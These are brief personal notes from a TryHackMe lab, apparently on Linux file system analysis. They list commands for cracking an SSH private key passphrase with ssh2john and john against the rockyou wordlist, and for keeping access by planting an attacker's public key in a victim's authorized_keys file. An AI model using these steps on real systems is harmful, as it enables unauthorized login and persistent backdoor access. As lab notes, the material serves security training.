RSA
cp id_rsa
ssh2john id_rsa > forjohn
john forjohn
john forjohn --wordlist=/usr/share/wordlist/rockyou.txt
ssh -i id_rsa jan@10.10.135.133
passhprase from john
If we have a permission in rsa authorized keys in victim's machine we can input our own ssh public key
ssh-keygen -t rsa
(enter passphrase)
cat id_rsa.pub
victim machine
paste it in the authorized_keys
attacker machine
ssh -i (theNAMEofSSH) user@10.10.10.10
ssh -i trylangssh user@10.10.10.10
(enter passphrase)
Tryhackme - Linux File System Analysis
Last updated